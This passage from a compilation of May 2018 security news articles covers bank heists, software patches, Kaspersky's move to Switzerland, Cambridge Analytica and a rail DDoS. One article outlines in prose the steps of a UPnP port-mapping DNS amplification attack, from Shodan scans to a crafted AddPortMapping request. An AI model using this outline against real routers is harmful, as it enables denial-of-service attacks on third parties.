AppEsteem’s third response is a short blog posted on the same day as CSA published its report – Thursday, 10 May 2018. There is no indication of any rapprochement with the CSA. “But we also want to be clear,” writes the author: “if you think it’s fine to treat consumers as exploitable targets for deceptive and aggressive software, we totally understand your desire for us to leave you alone. We strongly suggest you either get on board or find something else to do with your time, as we’re going to continue to tune our Deceptor program to find even more effective ways to disrupt your ability to hurt consumers.”

The way forward
It is hard to see how any outright deceptive app produced by developers simply out to get as much money as possible will ever be persuaded by force of argument alone to abandon deceptive practices. This seems to be the approach of the CSA; and it appears – on the evidence of its website – to have achieved little in its three to four years of existence.

Indeed, the one and only report the CSA has published is the report criticizing AppEsteem. Before that, the previous publication seems to be ‘update #7’, probably written around March 2016.

If the CSA has achieved anything, it is not saying so. At the very least, it could be urged to be more transparent in its operations and achievements – even a list of members would be useful.

Meantime, if the new CleanApps.org gathers pace and support, the CSA itself will become increasingly irrelevant in the battle against deceptive apps; that is, potentially unwanted programs.


Security Gaps Remain as OT, IT Converge
16.5.2018 securityweek  Cyber

The accelerating digitization of business, driven by compelling commercial arguments, is driving the integration of new information technology (IT) networks with older operational technology (OT) networks. This is introducing new security risks to old technology and old technology practices -- and where the OT is driving a critical manufacturing plant, the new risk is from nation-state actors as well as traditional cyber criminals.

The good news is that many organizations understand the risks and are actively engaged in mitigating those risks. The bad news is the risk mitigation process is far from complete.

Network and content security firm Fortinet commissioned Forrester Consulting to survey the state of converging IT / OT network security. In an associated blog, Fortinet's senior director of product marketing, Peter Newton, explains the cultural difference between IT and OT security: "IT teams have a tendency to just want to throw security technology at the network and call it good. But these networks can be very different, and what works well in one environment can have devastating consequences in the other. For example, an error that opens a port on a switch can have a very different result from one that opens a valve on a boiler."

In January 2018, Forrester queried 429 global decision-makers responsible for the security of their organization’s critical infrastructure from a range of different industries, asking about their IT / OT convergence (PDF) and the security challenges being faced. The result suggests that awareness is high, and steps are in progress (SCADA / ICS security spending is planned to increase by 77%) -- but there is much yet to be done (45% of respondents do not used privileged account management (PAM) for their administrators).

The last issue is particularly relevant given the extent to which converged networks are being opened to third-party suppliers. Sixty-four percent of the companies surveyed provide either complete or high-level access to their SCADA / ICS, including to outsourced suppliers, business partners and government agencies. This seems to be changing, with respondents taking steps to reduce the number of vendors used to provide security functions for IPS, NAC and IoT.

"The number of organizations that now rely on a single vendor to provide a full range of outsourced solutions has jumped from 38% to 47% between 2016 and 2018," comments John Maddison, Fortinet's SVP products and solutions, in a separate blog post.

Coupled with the lack of a PAM solution, the report highlights that 45% of the respondents do not use role-based access control, which provides openings for insider threats. Indeed, internal hackers are considered a greater threat (77% of respondents are extremely or very concerned) than external hackers (70%). The greatest concern is reserved for malware at 77%, with leakage of sensitive or confidential data at 70%.

The security threat is not hypothetical. While there have already been severaal highly-publicized incidents (such as the Ukraine power outages in December 2015, and the U.S. water utility incident in March 2016) the majority of respondents have also experienced a breach. Fifty-six percent of organizations using SCADA / ICS reported a breach in the past year, and only 11% indicated they have never been breached.

SCADA / ICS breaches can have serious consequences. "Sixty-three percent of organizations say the safety of their employees was highly or critically impacted by a SCADA / ICS security breach," notes the report. "Another 58% report major impacts to their organization’s financial stability, and 63% note a serious drag on their ability to operate at a sufficient level."

Solutions to the growing SCADA / ICS risk exist, but require a new approach beyond the traditional IT security approach. IT and OT teams speak different languages for security, comments Newton. Existing OT systems may be running on an obsolete operating system on hardware that is ten or more years old. "But that may be because it only has one job," he explains: "for example, monitoring a thermostat and then throwing a switch when it reaches a critical temperature. That doesn’t require the latest technology, and if it is doing the job it was designed to do, then there is no reason to change it. But because so many of these systems run on proprietary software and use delicate instrumentation, even something as benign as scanning a device for malware can cause it to malfunction."

Solutions do exist, but must be chosen with care. "When considering a security vendor for their SCADA / ICS environments," suggests Newton, "the ability to meet compliance standards and provide end-to-end solutions, along with a reputation for reliability are the most important attributes [the respondents] look for. These organizations are looking for solutions from a variety of vendors, from systems integrators to security manufacturers."


Hackers Divert Funds From Mexico Banks, Amount Unclear: Official
16.5.2018 securityweek  Hacking

Hackers have stolen an unknown amount of money from banks in Mexico in a series of cyber attacks on the country's interbank payments system, an official said Monday.

At least five attacks on the Mexican central bank's Interbank Electronic Payments System (SPEI) were carried out in April and May, said Lorenza Martinez, director general of the corporate payments and services system at the central bank.

"Some transactions were introduced that were not recognized by the issuing bank," she told Radio Centro.

"In some cases these transfers made it through to the destination bank and were withdrawn in cash."

She declined to reveal which banks were targeted.

Some Mexican media outlets have put the amount stolen at 400 million pesos ($20.4 million), but Martinez denied those reports.

"The amount is currently being analyzed. Some of the transfers were stopped, and the funds are currently being returned," she said.

She said the money stolen belonged to the banks themselves and that clients' funds were never affected.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Martinez said.

After the attacks were detected, banks switched to a slower but more secure method.

No new attacks have been registered since.


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
16.5.2018 securityweek 
Vulnerebility

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including a remote code execution flaw that has been exploited in the wild.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

The most serious of the flaws is CVE-2018-4990, which has been exploited in the wild in combination with CVE-2018-8120, a zero-day vulnerability affecting Windows. CVE-2018-8120 was fixed by Microsoft with the May 2018 Patch Tuesday updates.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.

*Updated with information on CVE-2018-4990


Symantec Shares More Information on Internal Investigation
16.5.2018 securityweek IT

Symantec shares gained nearly 10 percent on Monday in anticipation of a conference call that promised to provide more information regarding the internal investigation announced by the company last week.

Along with its financial results for the fourth quarter and full year, Symantec told investors last week that the Audit Committee of the Board of Directors had launched an investigation as a result of concerns raised by a former employee.

The company initially did not share any additional information, except that the Securities and Exchange Commission (SEC) had been notified and that the probe would likely prevent it from filing its annual 10-K report with the SEC in a timely manner.

Symantec shares dropped roughly 20 percent to less than $24 after the announcement was made on Thursday, and on Friday shares dove 33 percent, reaching just over $19.

A conference call announced for Monday afternoon helped the company gain nearly 10 percent, closing at $21.40.

While many expected Symantec to provide details on its internal probe, the company did not answer any questions on the matter. A statement published by the company does, however, reveal that the investigation is related to “concerns raised by a former employee regarding the Company’s public disclosures including commentary on historical financial results, its reporting of certain Non-GAAP measures including those that could impact executive compensation programs, certain forward-looking statements, stock trading plans and retaliation.”

The company says it cannot predict the duration of the investigation or the outcome, which could have an impact on financial results and guidance.

The cybersecurity firm says it does not anticipate a material adverse impact on its historical financial statements.

In response to news of the internal probe, investor rights law firm Rosen Law Firm announced the preparation of a class action to recover losses suffered by Symantec investors. Rosen says it’s investigating allegations that Symantec “may have issued materially misleading business information to the investing public.”


Kaspersky Lab to Move Core Infrastructure to Switzerland
16.5.2018 securityweek  BigBrothers

Swiss Data Storage

Company Will Open Transparency Center in Zurich by 2019; Data From Customers in North America Will be Stored and Processed in Switzerland

As part of its Global Transparency Initiative, Russia-based Kaspersky Lab today announced that it will adjust its infrastructure to move a number of "core processes" from Russia to Switzerland.

The security firm has had problems with the U.S. government. In September 2017, the U.S. Department of Homeland Security (DHS) instructed government departments and agencies to stop using products from the Russia-based firm.

There is no hard evidence that Kaspersky has ever colluded with the Russian government; and the lost U.S. government market is small in global terms. The bigger problem, however, is the knock-on effect that U.S. government criticism has on trust levels in the wider market.

In December 2017, Lithuania banned the use of Kaspersky Lab software within certain critical national industries. In April 2018, Twitter stopped accepting ads From Kaspersky Lab; and now, on May 15, 2018, the Dutch government announced it will phase out Kaspersky Lab anti-virus software 'as a precautionary measure'.

Justice Minister Ferdinand Grapperhaus told the Dutch parliament, “The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis. Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

Kaspersky Lab Logo

In December 2017, the UK's National Cyber Security Center published a letter it had sent to government permanent secretaries. It included, "In practical terms, this means that for systems processing information classified SECRET and above, a Russia-based provider should never be used."

It is to maintain or regain trust that is behind Kaspersky's Global Transparency Initiative, announced in October 2017.

"The new measures," the firm announced, "comprise the move of data storage and processing for a number of regions, the relocation of software assembly and the opening of the first Transparency Center," which will be in Zurich.

The measures in question include customer data storage and processing for most regions; and software assembly including threat detection updates. Transparency will be provided by making the source code available for review by responsible stakeholders in a dedicated Transparency Center.

The company said that by the end of 2018, its products and threat detection rule databases (AV databases) "will start to be assembled and signed with a digital signature in Switzerland, before being distributed to the endpoints of customers worldwide."

The firm is going further by making plans for its processes and source code to be independently supervised by a qualified third-party. To this end, it is supporting the creation of a new, non-profit organization able to assume this responsibility not just for itself, but for other partners and members who wish to join.

“The third-party organization is a non-profit organization to be established independently for the purpose of producing professional technical reviews of the trustworthiness of the security products of its members (including Kaspersky Lab)," the firm told SecurityWeek.

“Since transparency and trust are becoming universal requirements across the cybersecurity industry, Kaspersky Lab is supporting the creation of a new, non-profit organization to take on this responsibility, not just for the company, but for other partners and members who wish to join. The details of the new organization are currently being discussed and will be shared as soon as they are available.”

Switzerland has been chosen as the site of the Center as much for its symbolic importance as anything else. “We considered several locations for our first Transparency Center, and Switzerland most closely met our criteria as well as our policy of complete neutrality," Kaspersky Lab told SecurityWeek.

"We detect and remediate any malware, regardless of its source or purpose, while Switzerland has a long and famous history of neutrality. We also value Switzerland’s robust approach to data protection legislation.” Noticeably, Switzerland is one of just a handful of non-EU companies that has been recognized by Europe as having 'adequate' privacy controls.

Noticeably, Kaspersky Lab does not link the move specifically to the effects of the U.S. ban, but sees wider issues of global trust emerging. “We are implementing these measures first and foremost in response to the evolving, ultra-connected global landscape and the challenges the cyber-world is currently facing," it said.

"This is not exclusive to Kaspersky Lab, and we believe other organizations will in future also choose to adapt to these trends. Having said that, the overall aim of these measures is transparency, verified and proven, which means that anyone with concerns will now be able to see the integrity and trustworthiness of our solutions.”


Exploiting People Instead of Software: Report Shows Attacker Love for Human Interaction
16.5.2018 securityweek 
Exploit

Cybercriminals Continue to Rely on Human Interaction to Conduct Wide Range of Attacks

Cybercriminals have been scaling up people-centered threats, increasingly using social engineering rather than automated exploits even in web attacks, a recent report from Proofpoint report reveals.

Humans have been long said to be the best exploits in the eyes of cybecriminals, with social engineering becoming the most used attack method years back, when almost all attached documents and URLs in malicious emails required human interaction.

Now, Proofpoint’s The Human Factor 2018 report (PDF) reveals that both cybercriminals and threat actors have found new ways to trick victims into becoming their unwitting accomplices. Email remained the most popular attack vector, while the rise of crypto-currency drove innovations in phishing and cybercrime.

Proofpoint saw attacks that include both large, multimillion-message malicious campaigns distributing malware such as ransomware (the biggest email-borne threat of 2017) and highly targeted assaults orchestrated by state-sponsored groups and financially motivated fraudsters.

“Whether they are broad-based or targeted; whether delivered via email, social media, the web, cloud apps, or other vectors; whether they are motivated by financial gain or national interests, the social engineering tactics used in these attacks work time and time again. Victims clicked malicious links, downloaded unsafe files, installed malware, transferred funds, and disclosed sensitive information at scale,” Proofpoint notes.

Last year, suspiciously registered domains of large enterprises outnumbered brand-registered domains 20 to 1, according to the report. Furthermore, 95% of observed web-based attacks used social engineering to trick users into installing malware, 55% of social media attacks impersonating customer-support accounts targeted customers of financial services companies, and 35% of social media scams using links took users to video streaming and movie download sites.

Dropbox phishing was the top lure for phishing attacks, but click rates for Docusign lures were the highest. Network traffic of coin mining bots jumped almost 90% between September and November, while ransomware and banking Trojans accounted for more than 82% of all malicious email messages. Although used often in email campaigns, Microsoft Office exploits usually came in short bursts.

The largest numbers of email fraud attacks hit education, management consulting, entertainment, and media firms, while construction, manufacturing, and technology were the most phished industries. Manufacturing, healthcare, and technology firms were targeted the most by crimeware.

Although ransomware predominated worldwide, banking Trojans were highly popular in Europe and Japan, accounting for 36% and 37% of all malicious mail in those regions, respectively.

Proofpoint has examined hundreds of thousands of SaaS accounts during risk assessments conducted across industries and says that around 1% of all cloud service credentials have been leaked. Furthermore, the security firm discovered that 25% of all suspicious login attempts to cloud services were successful (24% of all logins to cloud services were suspicious).

Attackers are increasingly using cloud services that users are accustomed to receive email notifications from to send malicious messages and host malware. While no major cloud services avoided abuse, services such as G Suite and Evernote were used to send phishing emails and malware.

“Most cloud platforms are extensible. Third-party add-ons open up new features, but they also create possibilities for abuse. We found a vulnerability in Google Apps Script, for example, that allowed attackers to send malware through legitimate emails that came from G Suite accounts,” the security researchers report.

Looking at how people behave in response to these threats, Proofpoint discovered that North American employees tended to click at the beginning of the work day, at lunch, and the end of the work day. South America followed a similar pattern, but Australian employees were more likely to click in the morning.

Half of all clicks (52%), however occurred within one hour of the message being delivered, with 11% of recipients clicking on the malicious URL within the first minute and a quarter within 5 minutes.

Usually focused on high-profile targets, state-sponsored attackers and established cyber criminals switched to targeting smaller targets in 2017.

The North Korea- affiliated Lazarus Group launched multistage attacks against individuals and point-of-sale (POS) infrastructure to steal cryptocurrency and consumer credit card data. The financially-motivated FIN7 started targeting individuals within restaurant chains using a new backdoor and malicious macros.

The Cobalt Group used new malware and document exploits in attacks against financial institutions and used anti-sandbox features to make detection more difficult.

The security firm also observed cryptocurrency phishing campaigns and identified sophisticated phishing templates targeting wallets and exchanges, including one attack that used malicious Office documents to install a banking Trojan. As of January, the researchers discovered over 100,000 Bitcoin-related domains, some supposedly registered for nefarious purposes.

“Social engineering is at the heart of most attacks today. It can come through something as simple as a bogus invoice lure in a multimillion message malicious spam campaign. It may appear as an intricate fake chain of emails and out-of-band communications in email fraud. Even web-based attacks—which once depended almost exclusively on exploit kits and drive-by downloads—are now built around social engineering templates. People willingly download bogus software updates or fake anti-malware software,” Proofpoint notes.


New DDoS Attack Method Obfuscates Source Port Data
16.5.2018 securityweek 
Attack

Recent distributed denial of service (DDoS) attacks showed evidence of a new method being used to bypass existing defenses by obfuscating source port data, Imperva says.

In addition to commonly encountered amplification methods, the observed attacks used payloads with irregular source port data, a vector that only few DDoS defenders considered possible, Imperva claims. The attack method abuses a well-known, unpatched UPnP (Universal Plug and Play) protocol exploit.

The UPnP networking protocol allows for device discovery over UDP port 1900, and for device control over an arbitrarily chosen TCP port. Because of that, many Internet of Things devices use the protocol to discover and communicate to one another over LAN.

However, default settings leaving devices open to remote access, the lack of an authentication mechanism, and UPnP-specific remote code execution vulnerabilities have shown the protocol to pose security risks.

In addition to revealing UPnP related vulnerabilities for nearly two decades, security researchers have also shown how SOAP API calls could be used to remotely reconfigure insecure devices over WAN. SOAP API calls can also be used to remotely execute AddPortMapping commands, which govern port forwarding rules.

While mitigating a SSDP amplification assault on April 11, 2018, Imperva noticed that some of the payloads were arriving from an unexpected source port, and not UDP/1900. The same technique was used in another attack a couple of weeks later.

The investigation into these incidents led to the creation of a “PoC for an UPnP-integrated attack method that could be used to obfuscate source port information for any type of amplification payload,” the security firm says.

To perform DNS amplification attacks using this PoC, one would first have to locate an open UPnP router, which can be done by running a wide-scale scan with SSDP requests using a publicly available online service such as Shodan.

There are over 1.3 million devices that appear in such a search, although not all are vulnerable. Locating an exploitable one is still easy, as scripts can be used to automate the process.

Next, the attacker would need to access the device XML file (rootDesc.xml) via HTTP, which can be done by replacing the ‘Location’ IP with the actual device IP in Shodan.

With the rootDesc.xml file listing all of the available UPnP services and devices, the next step is to modify the device’s port forwarding rules, which can be done via the AddPortMapping command, which is the first on the said list.

“Using the scheme within the file, a SOAP request can be crafted to create a forwarding rule that reroutes all UDP packets sent to port 1337 to an external DNS server (3.3.3.3) via port UDP/53,” Imperva notes.

This works because, although port forwarding should only be used for mapping traffic from external IPs to internal IPs and vice versa, most routers don’t verify that a provided internal IP is actually internal, this allowing proxy requests from external IPs to another external IP.

To use this for port-obfuscated DNS amplification, a DNS request issued to the device and received by the UPnP device on port UDP/1337 is proxied to a DNS resolver over destination port UDP/53. The resolver responds to the device over source port UDP/53, and the device forwards the DNS response back to the original requestor after changing the source port back to UDP/1337.

“In an actual attack scenario, however, the initial DNS request would have been issued from a spoofed victim’s IP, meaning that the response would have been bounced back to the victim,” Imperva notes.

The device could be used to launch a DNS amplification DDoS assault with evasive ports, as the payloads would originate from irregular source ports, thus being able to bypass commonplace defenses that identify amplification payloads by looking for source port data. The evasion method can also be used for SSDP and NTP attacks and could work with other amplification vectors as well, including Memcached.

“With source IP and port information no longer serving as reliable filtering factors, the most likely answer is to perform deep packet inspection (DPI) to identify amplification payloads—a more resource-intensive process, which is challenging to perform at an inline rate without access to dedicated mitigation equipment,” Imperva notes.


Signal Flaw Allowed Code Execution With No User Interaction
16.5.2018 securityweek 
Vulnerebility

An update released over the weekend for the desktop version of the privacy-focused communications app Signal patches a critical vulnerability that could have been exploited for remote code execution with no user interaction required.

Several researchers were looking at an unrelated cross-site scripting (XSS) vulnerability when they noticed that the XSS payload was triggered in the Signal desktop application.

The white hat hackers discovered that they could execute arbitrary code in the app simply by sending a specially crafted message containing specific HTML elements to the targeted user.

“The Signal-desktop software fails to sanitize specific html-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically the <img> and <iframe> tags can be used to include remote or local resources,” the researchers explained in an advisory.

They created proof-of-concept (PoC) payloads that could be used to crash Signal, obtain data from the targeted device’s /etc/passwd file, execute a remote JavaScript file, display a message in an iframe, play audio and video files, display a phishing page, and exfiltrate conversations.

Signal code execution vulnerability

“The critical thing here was that it didn’t required any interaction form the victim, other than simply being in the conversation. Anyone can initiate a conversation in Signal, so the attacker just needs to send a specially crafted URL to pwn the victim without further action,” Iván Ariel Barrera Oro, one of the researchers involved in finding the vulnerability, wrote in a blog post.

The vulnerability affects versions 1.7.1, 1.8.0, 1.9.0 and 1.10.0 on Windows, Linux and likely macOS. Signal developers patched the issue within a couple of hours with the release of version 1.10.1 on Saturday.

Based on an analysis of the source code, researchers determined that the flaw had been previously patched but the fix was removed – likely by accident – with a change made on April 10.


Serbia Arrests FBI-sought Cybercrime Suspect
16.5.2018 securityweek  BigBrothers

Serbian police said Wednesday they had arrested a man sought by the FBI under suspicion of being part of a group of cybercriminals who called themselves "The Dark Overlord".

The arrest of the 38-year-old Serbian from Belgrade, identified only by his initials S.S., was carried out as part of an "international operation conducted by the FBI," a police statement said.

The goal was to identify and arrest hackers who used the name "The Dark Overlord" and had been committing cyberattacks since June 2016, the statement added.

Members of the group were "stealing information and personal data from US citizens, including property and intellectual property data, sensitive health insurance and medical treatment data," it said.

At least 50 people were victims of attacks, the investigation found.

Police said the arrested man is accused of "illegal access to protected computers, computer networks and extorsion".

In late April, a British and Dutch-led operation brought down a website linked to more than four million cyberattacks around the world, with banking giants among the victims.

Two people, suspected of being administrators of the webstresser(.)org website were arrested in Serbia at the time.


Some Firefox Screenshots End Up Publicly Accessible
16.5.2018 securityweek  Security

Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.

Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.

This allows users to save a screenshot of the entire page, of the visible section of the page, or use a selection tool to save only a region they consider important. Next, they can dismiss the action, copy the screenshot, download it, or click a “Save” button that sends the screenshot to the cloud.

All saved screenshots go to https://screenshots.firefox.com, a default setting in the browser. Furthermore, all screenshots that have been previously shared to public forums are indexed by search engines such as Google and could be discovered and accessed by anyone.

Screenshots are sent to the public server only when the user clicks the “Save” button. Many users, however, might have been long doing so without realizing that they were actually sending them to the cloud.

Firefox screenshots can end up publicly exposed

Mozilla issued a fix for the issue yesterday, soon after details on it emerged on Twitter. Apparently, this is not the first time the organization attempts to address this, but the previous implementation was flawed.

Specifically, in its attempt to avoid shot pages being indexed by search engines, Mozilla replaced robots.txt with <meta name=robots value=noindex>, but the fix was “only put in place for expired pages instead of all pages as intended.”

“So this is being deployed and now we're talking to DDG/Google etc to strip the domains,” John Gruen, UX-focused Product Manager at Mozilla, told the ethical hacker who discovered the flaw.

Updated: A previous version of this article incorrectly stated that all screenshots end up being publicly accessible.


Cambridge Analytica Shared Data With Russia: Whistleblower
16.5.2018 securityweek  BigBrothers

Political consulting group Cambridge Analytica used Russian researchers and shared data with companies linked to Russian intelligence, a whistleblower told a congressional hearing on interference in the 2016 US election Wednesday.

Christopher Wylie, who leaked information on the British-based firm's hijacking of data on millions of Facebook users, told a Senate panel he believes Russian intelligence services had access to data harvested by the consultancy.

Wylie told the panel that Russian-American researcher Aleksandr Kogan, who created an application to harvest Facebook user profile data, was working at the same time on Russian-funded projects, including "behavioral research."

"This means that in addition to Facebook data being accessed in Russia, there are reasonable grounds to suspect that CA may have been an intelligence target of Russian security services...(and) that Russian security services may have been notified of the existence of CA's Facebook data," Wylie said in his written testimony.

Wylie added that Cambridge Analytica "used Russian researchers to gather its data, (and) openly shared information on 'rumor campaigns' and 'attitudinal inoculation'" with companies and executives linked to the Russian intelligence agency FSB.

The hearing is part of a broad inquiry on both sides of the Atlantic over the misuse of Facebook data by the consulting firm working on Donald Trump's 2016 campaign.

Facebook has accused Cambridge Analytica of misappropriating its user data by violating terms of the data agreement with Kogan, the academic researcher.

On Tuesday, the New York Times reported that the FBI and Justice are investigating Cambridge Analytica for potential criminal violations.

The Times said it was unclear whether the probe was linked to the one led by Special Counsel Robert Mueller, who is investigating whether the Trump campaign colluded with Russia.

'Black ops' at CA

Wylie told the panel that "the ethos of the firm was 'anything goes'" for its political campaigns, including "attempting to divert health ministry funds in a struggling African country to support a politician's re-election campaign."

He added that he was aware of "black ops" at the company, "which I understood to include using hackers to break into computer systems to acquire kompromat or other intelligence for its clients."

He said that one of the tactics used to interfere with voter participation included "weaponizing fear."

"In one country, CA produced videos intended to suppress turnout by showing voters sadistic images of victims being burned alive, undergoing forced amputations with machetes and having their throats cut in a ditch," he said.

"These videos also conveyed Islamophobic messages. It was created with a clear intent to intimidate certain communities, catalyze religious hatred, portray Muslims as terrorists and deny certain voters of their democratic rights."

Cambridge Analytica announced earlier this month it was shutting down, unable to recover from the Facebook-linked scandal.

Its chief executive Alexander Nix was suspended after he was filmed by undercover reporters bragging about ways to win political campaigns, including through blackmail and honey traps.

Another whistleblower said that Britons' personal data may have been misused by a pro-Brexit campaign ahead of the 2016 referendum in which Britain voted to leave the European Union.


Auth0 Secures $55 Million in New Funding Round
16.5.2018 securityweek  Safety

Identity-as-a-Service (IDaaS) company Auth0 this week announced $55 million in Series D funding led by Sapphire Ventures.

To date, the Bellevue, Wash.-based identity management and authentication company has secured more than $110 million in financing. The firm offers a Universal Identity Platform for web, mobile, IoT, and internal applications and authenticates and secures more than 1.5 billion logins per month.

As part of the new financing round, the firm received investment from World Innovation Lab and existing investors Bessemer Venture Partners, Trinity Ventures, Meritech Capital, and K9 Ventures.

Auth0 plans on using the funds to continue innovation of its Universal Identity Platform, which the company says is used by companies such as VMware, AMD, Mazda, NVIDIA, News Corp, and thousands of others.

Founded in 2013, the company says it managed to double its overall customers and registered more than 100 percent revenue growth last year. This allowed it to hire 140 new employees and open additional offices in London, Sydney, and Tokyo.

“We are humbled by the support from our investors, and emboldened in our mission to provide the most extensible, powerful, and easy-to-use identity management solution available. We look forward to using these funds to make our product and company even better, and to continue offering value to our incredible customers around the world,” said Eugenio Pace, CEO and Co-founder of Auth0.

Last week, Auth0 announced it has joined the Decentralized Identity Foundation (DIF), an initiative from Microsoft, uPort, Gem, Evernym, Blockstack, and Tierion, focused on creating a standards-based ecosystem for managing digital identities. Together with IBM, Accenture, RSA, IDEO, and others, Auth0 will work on creating the specifications for securing and accessing identity data.

“Digital identity is the core of every interaction, transaction, and communication online, but it’s a little like the Wild West right now in terms of standards and specifications around how identity could be handled in a decentralized manner. There is an important need for strong voices to shape the future of this industry, and we are looking forward to our involvement with the Decentralized Identity Foundation,” Martin Gontovnikas, Vice President of Marketing at Auth0, said.


Operation Hotel – Ecuador spent millions on spy operation for Julian Assange
16.5.2018 securityaffairs BigBrothers

According to The Guardian newspaper, Ecuador spent millions on spy operation for Julian Assange after he hacked the embassy network.
According to a report published by the Guardian, Ecuador spied on WikiLeaks founder Julian Assange at its London embassy where he took in political asylum since 2012,

In 2012 a British judge ruled he should be extradited to Sweden to face allegations of sexual assault there, but Assange explained that they were political accusations.

“Ecuador bankrolled a multimillion-dollar spy operation to protect and support Julian Assange in its central London embassy, employing an international security company and undercover agents to monitor his visitors, embassy staff and even the British police, according to documents seen by the Guardian.” reads the report published by The Guardian.

“Over more than five years, Ecuador put at least $5m (£3.7m) into a secret intelligence budget that protected the WikiLeaks founder while he had visits from Nigel Farage, members of European nationalist groups and individuals linked to the Kremlin.”

The newspaper revealed Equador spent $5.0 million on the operation codenamed “Operation Guest” and later “Operation Hotel” that was approved by the then Ecuadorian president, Rafael Correa, and the then foreign minister, Ricardo Patiño.

Initially, the operation aimed at the Assange’s protection, but later became a spying operation on the journalist. From June 2012 to the end of August 2013, Operation Hotel cost Ecuador $972,889, according to documents belonging to the Senain, the Ecuadorian intelligence agency.

The experts hired by Equador monitored Assange’s daily activities and any contact with external staff and visitors, the stayed in a rented flat near the embassy at a cost of £2,800 a month.

Julian Assange

“Documents show the intelligence programme, called “Operation Guest”, which later became known as “Operation Hotel” – coupled with parallel covert actions – ran up an average cost of at least $66,000 a month for security, intelligence gathering and counter-intelligence to “protect” one of the world’s most high-profile fugitives.” continues the newspaper. the paper said.

According to The Guardian, that cited documents it has vieved, Assange hacked the communications system within the embassy gaining access to staff communications.

“In an extraordinary breach of diplomatic protocol, Assange managed to compromise the communications system within the embassy and had his own satellite internet access, according to documents and a source who wished to remain anonymous.” continues the paper

“By penetrating the embassy’s firewall, Assange was able to access and intercept the official and personal communications of staff,”

Wikileaks denied Assange had hacked the embassy network.

WikiLeaks

@wikileaks
No, @Guardian, @JulianAssange did not "hack into" embassy
satellites. That's an anonymous libel aligned with the current UK-US government onslaught against Mr. Assange's asylum--while he can't respond. You've gone too far this time. We're suing. https://www.newsweek.com/assange-how-guardian-milked-edward-snowdens-story-323480 …

8:19 PM - May 15, 2018
2,381
1,702 people are talking about this
Twitter Ads info and privacy
In response, Ecuador has forbidden internet access for Assange in recent months with the installation of a jammer, the Government as also restricted the number of visitors he can receive.

“Assange claims the accusations were politically motivated and could lead to him being extradited to the United States to face imprisonment over WikiLeaks’ publication of secret US military documents and diplomatic cables in 2010.” reported the AFP agency.

“Ecuador in December made Assange an Ecuadoran citizen and unsuccessfully tried to register him as a diplomat with immunity as part of its efforts to have him leave the embassy without risk of being detained.”

Last year, Sweden dropped its investigation on Assange, but the British authorities still plan to arrest him for breaching his bail conditions.


Massive DDoS attack hit the Danish state rail operator DSB
16.5.2018 securityaffairs
Attack

The Danish state rail operator DSB was hit by a massive DDoS cyber attack that paralyzed some operations, including ticketing systems and the communication infrastructure.
The Danish state rail operator DSB was hit by an unprecedented DDoS cyber attack, the attack was confirmed on Monday by the company and reported by The Local media outlet.

The attack was launched on Sunday and paralyzed the ticketing system and prevented passengers across the country from buying tickets.

“Tickets purchases via the company’s app, ticket machines, website and in 7-Eleven stores were all out of action due to the issue on Sunday.” reported The Local.

“Passengers with Rejsekort travel cards were able to use that system, while others purchased tickets from ticket inspectors on board trains.”

The state rail operator DSB restored normal operations on Monday morning

The company experts confirmed the attack from an external source with the specific intent to destroy the operations at the state rail operator DSB. The hackers took offline also internal mail system and the telephone infrastructure. The only way to communicate with the customers was represented by social media.

DSB

@omDSB
Der er i øjeblikket tekniske problemer med http://dsb.dk , salgskanaler, trafikinfo samt vores telefonlinjer. Vi arbejder på at løse fejlen.

7:04 PM - May 13, 2018
6
See DSB's other Tweets
Twitter Ads info and privacy

DSB

@omDSB
Vi er blevet gjort opmærksomme på, at andre fortsat oplever fejl, når de forsøger at komme på http://dsb.dk .

Det er blevet fejlmeldt og vi arbejder på sagen. https://twitter.com/omDSB/status/995879867022565378 …

7:28 AM - May 14, 2018
See DSB's other Tweets
Twitter Ads info and privacy
The train safety was not compromised by hackers, assured the deputy director.

“Our technicians and IT contractors have analysed this closely during the night and have concluded this is an outside attack in which someone has attempted to bring our system down,” DSB vice-director Aske Wieth-Knudsen said.

Danish state rail operator DSB

“”We have previously been subjected to an attack and, of course, we have made some processes to avoid this. The type of attack we saw yesterday is a new way of doing it, as we have not seen before. So it needs to be analyzed a bit closer, exactly what has happened so we can prevent it from repeating, says Aske Wieth-Knudsen.” Wieth-Knudsen told DR.

The company is investigating the issue along with Danish authorities and are monitoring the situation to prevent further attacks.

